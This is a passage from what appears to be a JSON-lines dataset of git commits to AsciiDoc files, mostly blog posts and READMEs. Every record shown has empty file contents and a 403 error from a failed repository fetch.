ganke\/elasticsearch,Uiho\/elasticsearch,uschindler\/elasticsearch,Collaborne\/elasticsearch,wenpos\/elasticsearch,kaneshin\/elasticsearch,jpountz\/elasticsearch,zhiqinghuang\/elasticsearch,spiegela\/elasticsearch,caengcjd\/elasticsearch,palecur\/elasticsearch,Collaborne\/elasticsearch,zkidkid\/elasticsearch,fernandozhu\/elasticsearch,weipinghe\/elasticsearch,nazarewk\/elasticsearch,weipinghe\/elasticsearch,himanshuag\/elasticsearch,polyfractal\/elasticsearch,awislowski\/elasticsearch,strapdata\/elassandra5-rc,kalburgimanjunath\/elasticsearch,ricardocerq\/elasticsearch,kaneshin\/elasticsearch,clintongormley\/elasticsearch,jango2015\/elasticsearch,polyfractal\/elasticsearch,hafkensite\/elasticsearch,bawse\/elasticsearch,pranavraman\/elasticsearch,bawse\/elasticsearch,markharwood\/elasticsearch,pozhidaevak\/elasticsearch,strapdata\/elassandra5-rc,mm0\/elasticsearch,clintongormley\/elasticsearch,F0lha\/elasticsearch,alexshadow007\/elasticsearch,diendt\/elasticsearch,kalimatas\/elasticsearch,strapdata\/elassandra,kingaj\/elasticsearch,vroyer\/elasticassandra,mgalushka\/elasticsearch,F0lha\/elasticsearch,springning\/elasticsearch,LewayneNaidoo\/elasticsearch,tebriel\/elasticsearch,Collaborne\/elasticsearch,jimczi\/elasticsearch,yynil\/elasticsearch,himanshuag\/elasticsearch,sdauletau\/elasticsearch,fforbeck\/elasticsearch,winstonewert\/elasticsearch,ouyangkongtong\/elasticsearch,drewr\/elasticsearch,episerver\/elasticsearch,henakamaMSFT\/elasticsearch,kalburgimanjunath\/elasticsearch,vroyer\/elasticassandra,wittyameta\/elasticsearch,umeshdangat\/elasticsearch,infusionsoft\/elasticsearch,kunallimaye\/elasticsearch,masterweb121\/elasticsearch,liweinan0423\/elasticsearch,diendt\/elasticsearch,mm0\/elasticsearch,lydonchandra\/elasticsearch,scorpionvicky\/elasticsearch,mapr\/elasticsearch,MetSystem\/elasticsearch,karthikjaps\/elasticsearch,kalimatas\/elasticsearch,girirajsharma\/elasticsearch,jchampion\/elasticsearch,rmuir\/elasticsearch,masterweb121\/elasticsearch,schonfeld\/elasticsearch,nknize\/elasticsearch,mapr\/elasticsearch,jchampion\/elasticsearch,YosuaMichael\/elasticsearch,coding0011\/elasticsearch,karthikjaps\/elasticsearch,palecur\/elasticsearch,maddin2016\/elasticsearch,lzo\/elasticsearch-1,caengcjd\/elasticsearch,s1monw\/elasticsearch,liweinan0423\/elasticsearch,coding0011\/elasticsearch,iacdingping\/elasticsearch,clintongormley\/elasticsearch,elasticdog\/elasticsearch,fernandozhu\/elasticsearch,infusionsoft\/elasticsearch,qwerty4030\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,HonzaKral\/elasticsearch,MichaelLiZhou\/elasticsearch,cnfire\/elasticsearch-1,ZTE-PaaS\/elasticsearch,tahaemin\/elasticsearch,mm0\/elasticsearch,henakamaMSFT\/elasticsearch,schonfeld\/elasticsearch,ZTE-PaaS\/elasticsearch,yynil\/elasticsearch,andrejserafim\/elasticsearch,gfyoung\/elasticsearch,pranavraman\/elasticsearch,onegambler\/elasticsearch,LeoYao\/elasticsearch,hafkensite\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/mapping\/fields\/source-field.asciidoc","new_file":"docs\/reference\/mapping\/fields\/source-field.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8706a5a7b4f9e8e327bccc1fffcc181d2242c44f","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 
2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4423bfa4430a1cc8341a31909cf7159fd8ab23d","subject":"Update 2016-10-09-Running-fish-on-Windows-10.adoc","message":"Update 2016-10-09-Running-fish-on-Windows-10.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2016-10-09-Running-fish-on-Windows-10.adoc","new_file":"_posts\/2016-10-09-Running-fish-on-Windows-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2524e3e8897a8839b3fc2ca999761c4468afdfcd","subject":"Update 2018-06-01-FW4SPL-161-released.adoc","message":"Update 2018-06-01-FW4SPL-161-released.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2018-06-01-FW4SPL-161-released.adoc","new_file":"_posts\/2018-06-01-FW4SPL-161-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a50acce7024f39784e4b9eb8ef4b22c140620737","subject":"Update 2015-09-26-Programming-in-Scala.adoc","message":"Update 2015-09-26-Programming-in-Scala.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e914b89c9c1a7fc169a3f113b2902cd41df91c28","subject":"Update 2017-09-26-zapier-Google-Trello.adoc","message":"Update 2017-09-26-zapier-Google-Trello.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31e1458b369375aac9fcdabbc9842236a1681f6e","subject":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","message":"Update 
2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"019855a599bbe5fffb9a6a88f7d2fbc34cbd1c74","subject":"Update 2016-06-02-hello.adoc","message":"Update 2016-06-02-hello.adoc","repos":"chdask\/chdask.github.io,chdask\/chdask.github.io,chdask\/chdask.github.io,chdask\/chdask.github.io","old_file":"_posts\/2016-06-02-hello.adoc","new_file":"_posts\/2016-06-02-hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chdask\/chdask.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41030865cb14bbe37258e4b9efb06ebcc1c46f4d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8e9f9c8c5ce398bbe721162fa2fac1a7777da70","subject":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","message":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d71da5890ff9fad607f8761b6c67a95d3b5dfb7e","subject":"Quarkus blogpost","message":"Quarkus blogpost\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-03-14-debezium-meets-quarkus.adoc","new_file":"blog\/2019-03-14-debezium-meets-quarkus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a330bd380df8acc2f1e34d9e1c600fe9263deebd","subject":"Adding release announcement for 0.5.2","message":"Adding release announcement for 0.5.2\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2017-08-17-debezium-0-5-2-is-out.adoc","new_file":"blog\/2017-08-17-debezium-0-5-2-is-out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef925158e309cedd42fd28efa0750b53174fee67","subject":"Update README","message":"Update README\n","repos":"pjanouch\/ell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"194a7a0c9bc4b911408e7cd81abb61daa599996a","subject":"Fix broken links to Gradle and Maven tools, and CLI samples in README","message":"Fix broken links to Gradle and Maven tools, and CLI samples in README\n\nCloses gh-12776\n","repos":"scottfrederick\/spring-boot,royclarkson\/spring-boot,michael-simons\/spring-boot,dreis2211\/spring-boot,tsachev\/spring-boot,scottfrederick\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,aahlenst\/spring-boot,donhuvy\/spring-boot,tiarebalbi\/spring-boot,habuma\/spring-boot,donhuvy\/spring-boot,drumonii\/spring-boot,kdvolder\/spring-boot,ptahchiev\/spring-boot,zhanhb\/spring-boot,scottfrederick\/spring-boot,michael-simons\/spring-boot,NetoDevel\/spring-boot,ilayaperumalg\/spring-boot,drumonii\/spring-boot,eddumelendez\/spring-boot,tsachev\/spring-boot,philwebb\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,NetoDevel\/spring-boot,htynkn\/spring-boot,htynkn\/spring-boot,eddumelendez\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,tiarebalbi\/spring-boot,htynkn\/spring-boot,lburgazzoli\/spring-boot,mdeinum\/spring-boot,philwebb\/spring-boot,habuma\/spring-boot,rweisleder\/spring-boot,yangdd1205\/spring-boot,mbenson\/spring-boot,zhanhb\/spring-boot,michael-simons\/spring-boot,mbenson\/spring-boot,Buzzardo\/spring-boot,jxblum\/spring-boot,drumonii\/spring-boot,eddumelendez\/spring-boot,vpavic\/spring-boot,dreis2211\/spring-boot,zhanhb\/spring-boot,rweisleder\/spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,ptahchiev\/spring-boot,habuma\/spring-boot,hello2009chen\/spring-boot,NetoDevel\/spring-boot,shakuzen\/spring-boot,vpavic\/spring-boot,dreis2211\/spring-boot,kdvolder\/spring-boot,lburgazzoli\/spring-boot,jxblum\/spring-boot,zhanhb\/spring-boot,shakuzen\/spring-boot,hello2009chen\/spring-boot,donhuvy\/spring-boot,ilayaperumalg\/spring-boot,joshiste\/spring-boot,felipeg48\/spring-boot,rweisleder\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot,htynkn\/spring-boot,michael-simons\/spring-boot,spring-projects\/spring-boot,ilayaperumalg\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot,NetoDevel\/spring-boot,rweisleder\/spring-boot,felipeg48\/spring-boot,spring-projects\/spring-boot,royclarkson\/spring-boot,wilkinsona\/spring-boot,tiarebalbi\/spring-boot,rweisleder\/spring-boot,donhuvy\/spring-boot,shakuzen\/spring-boot,spring-projects\/spring-boot,yangdd1205\/spring-boot,mbenson\/spring-boot,vpavic\/spring-boot,royclarkson\/spring-boot,scottfrederick\/spring-boot,wilkinsona\/spring-boot,wilkinsona\/spring-boot,wilkinsona\/spring-boot,felipeg48\/spring-boot,bclozel\/spring-boot,ptahchiev\/spring-boot,aahlenst\/spring-boot,bclozel\/spring-boot,tiarebalbi\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,rweisleder\/spring-boot,ptahchiev\/spring-boot,bclozel\/spring-boot,donhuvy\/spring-boot,bclozel\/spring-boot,zhanhb\/spring-boot,chrylis\/spring-boot,joshiste\/spring-boot,aahlenst\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,chrylis\/spring-boo
t,htynkn\/spring-boot,joshiste\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,chrylis\/spring-boot,joshiste\/spring-boot,jxblum\/spring-boot,lburgazzoli\/spring-boot,felipeg48\/spring-boot,lburgazzoli\/spring-boot,vpavic\/spring-boot,eddumelendez\/spring-boot,aahlenst\/spring-boot,jxblum\/spring-boot,eddumelendez\/spring-boot,aahlenst\/spring-boot,ptahchiev\/spring-boot,drumonii\/spring-boot,lburgazzoli\/spring-boot,ilayaperumalg\/spring-boot,michael-simons\/spring-boot,joshiste\/spring-boot,kdvolder\/spring-boot,tsachev\/spring-boot,ilayaperumalg\/spring-boot,ptahchiev\/spring-boot,kdvolder\/spring-boot,scottfrederick\/spring-boot,jxblum\/spring-boot,yangdd1205\/spring-boot,hello2009chen\/spring-boot,tiarebalbi\/spring-boot,philwebb\/spring-boot,kdvolder\/spring-boot,wilkinsona\/spring-boot,NetoDevel\/spring-boot,shakuzen\/spring-boot,tsachev\/spring-boot,tsachev\/spring-boot,mdeinum\/spring-boot,mdeinum\/spring-boot,hello2009chen\/spring-boot,Buzzardo\/spring-boot,mbenson\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,zhanhb\/spring-boot,habuma\/spring-boot,felipeg48\/spring-boot,shakuzen\/spring-boot,spring-projects\/spring-boot,jxblum\/spring-boot,chrylis\/spring-boot,tiarebalbi\/spring-boot,mdeinum\/spring-boot,donhuvy\/spring-boot,Buzzardo\/spring-boot,hello2009chen\/spring-boot,ilayaperumalg\/spring-boot,wilkinsona\/spring-boot,joshiste\/spring-boot,drumonii\/spring-boot,htynkn\/spring-boot,chrylis\/spring-boot,bclozel\/spring-boot,spring-projects\/spring-boot,habuma\/spring-boot,eddumelendez\/spring-boot,Buzzardo\/spring-boot,bclozel\/spring-boot,aahlenst\/spring-boot,Buzzardo\/spring-boot,mbenson\/spring-boot","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lburgazzoli\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"783ef6826173fd99400f4a907e6fbce3fb3414c8","subject":"Adding pypi version badge to readme.","message":"Adding pypi version badge to readme.\n","repos":"hypatia-software-org\/hypatia-engine,Applemann\/hypatia,lillian-lemmer\/hypatia,brechin\/hypatia,brechin\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ed1639c4ab998e4bae7f943f89657ac84d7ce7b","subject":"Publish 2016-12-2-3-D.adoc","message":"Publish 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-D.adoc","new_file":"2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"418ee094cc30ffd442d7b7928fe5d4d85c5df9b1","subject":"add news","message":"add 
news\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/03\/04\/clojure1-10-3.adoc","new_file":"content\/news\/2021\/03\/04\/clojure1-10-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c0ad8baf000633d01a0dc9b9e43b150f73ed0ef6","subject":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","message":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","new_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a6ff1776d1d8db992eaeeaa5fb8797cb877e15e","subject":"try-out: Add a set of quote examples","message":"try-out: Add a set of quote examples\n\nThis is used to exercise the quote and aquote environments.\n\nSigned-off-by: Otavio Salvador <1d31b11c1b92bf5d043d36edfe7174db39a6b891@ossystems.com.br>\n","repos":"jxxcarlson\/asciidoctor-latex,asciidoctor\/asciidoctor-latex,jxxcarlson\/asciidoctor-latex,jxxcarlson\/asciidoctor-latex,asciidoctor\/asciidoctor-latex,asciidoctor\/asciidoctor-latex","old_file":"try-out\/quote.adoc","new_file":"try-out\/quote.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/asciidoctor-latex.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a914fcb55716ead8e0bbd8a03cde869c9be1ea28","subject":"Update 2015-05-03-BIG-dataVistsSummer-20151.adoc","message":"Update 2015-05-03-BIG-dataVistsSummer-20151.adoc","repos":"crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io","old_file":"_posts\/2015-05-03-BIG-dataVistsSummer-20151.adoc","new_file":"_posts\/2015-05-03-BIG-dataVistsSummer-20151.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crazyrandom\/crazyrandom.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95d7e0bb21cdb8db71b1ae29970076c183b269ee","subject":"Update 2016-11-12-231900-Saturday-Remainder.adoc","message":"Update 2016-11-12-231900-Saturday-Remainder.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-12-231900-Saturday-Remainder.adoc","new_file":"_posts\/2016-11-12-231900-Saturday-Remainder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df75c33a3799ba46fc06e66927c0cb8f61d01299","subject":"Update 2019-11-26-The-Bluster-A-Short-Story.adoc","message":"Update 
2019-11-26-The-Bluster-A-Short-Story.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-11-26-The-Bluster-A-Short-Story.adoc","new_file":"_posts\/2019-11-26-The-Bluster-A-Short-Story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bcaafda4847484e99d8353e4d34e676d4fdc793","subject":"y2b create post ZOMBIE EDITION SURVIVAL BOX","message":"y2b create post ZOMBIE EDITION SURVIVAL BOX","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-21-ZOMBIE-EDITION-SURVIVAL-BOX.adoc","new_file":"_posts\/2016-01-21-ZOMBIE-EDITION-SURVIVAL-BOX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2848218fc0ef0792132764fb3d1b6f38791ac489","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e26e9ba3f8308f91e9c54cc9f48657499c36ea2","subject":"Readme","message":"Readme\n\n","repos":"ysden123\/poc,ysden123\/poc,ysden123\/poc,ysden123\/poc,ysden123\/poc,ysden123\/poc","old_file":"kinesis\/sample1\/README.adoc","new_file":"kinesis\/sample1\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ysden123\/poc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"857adb57d99d76156f04b738f232a77fbc8e174f","subject":"more doc work","message":"more doc work\n","repos":"sirjorj\/libxwing","old_file":"API.adoc","new_file":"API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b743578e4ecaac71ad14b3a7648acd5b56d7fc00","subject":"Update 2016-04-04-T-I-T-R-E.adoc","message":"Update 2016-04-04-T-I-T-R-E.adoc","repos":"nicolasmaurice\/nicolasmaurice.github.io,nicolasmaurice\/nicolasmaurice.github.io,nicolasmaurice\/nicolasmaurice.github.io,nicolasmaurice\/nicolasmaurice.github.io","old_file":"_posts\/2016-04-04-T-I-T-R-E.adoc","new_file":"_posts\/2016-04-04-T-I-T-R-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolasmaurice\/nicolasmaurice.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff8a92190dc98cb29301580c81a789356f267394","subject":"Update 2016-11-16-Test-post.adoc","message":"Update 
2016-11-16-Test-post.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress","old_file":"_posts\/2016-11-16-Test-post.adoc","new_file":"_posts\/2016-11-16-Test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adea883183dd6a8ab3eeb4063269f148743ce9b7","subject":"Update 2017-03-26-Coordenadas-por-Geocodificacion-PHP.adoc","message":"Update 2017-03-26-Coordenadas-por-Geocodificacion-PHP.adoc","repos":"AgustinQuetto\/AgustinQuetto.github.io","old_file":"_posts\/2017-03-26-Coordenadas-por-Geocodificacion-PHP.adoc","new_file":"_posts\/2017-03-26-Coordenadas-por-Geocodificacion-PHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AgustinQuetto\/AgustinQuetto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eef8a5ba84d7e9994713466139bff9a1eb06714d","subject":"Update 2016-09-18-Information-Technology-Week-2.adoc","message":"Update 2016-09-18-Information-Technology-Week-2.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-18-Information-Technology-Week-2.adoc","new_file":"_posts\/2016-09-18-Information-Technology-Week-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38f7d4be0b0f222ec3aa83f3228b4aaaf47c7ac3","subject":"Update 2018-04-13-To-automate-analyzing-J-I-R-A.adoc","message":"Update 2018-04-13-To-automate-analyzing-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-To-automate-analyzing-J-I-R-A.adoc","new_file":"_posts\/2018-04-13-To-automate-analyzing-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec7a702108d3c800caca6d1e7c1f8e467f6c1f15","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11801dcc32def8bc42f55d5e89696dab0c757df2","subject":"Update 2016-7-19-and.adoc","message":"Update 2016-7-19-and.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-19-and.adoc","new_file":"_posts\/2016-7-19-and.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5eecd4bf3765323a994fb14a33b4738bf182312a","subject":"Adding the new page for trying out GKO","message":"Adding the new page for trying out GKO\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/kubernetes\/apim-kubernetes-operator-user-guide-play.adoc","new_file":"pages\/apim\/3.x\/kubernetes\/apim-kubernetes-operator-user-guide-play.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"958ce6688ed76a2ad8389f49f30b513d8368fc3a","subject":"Update 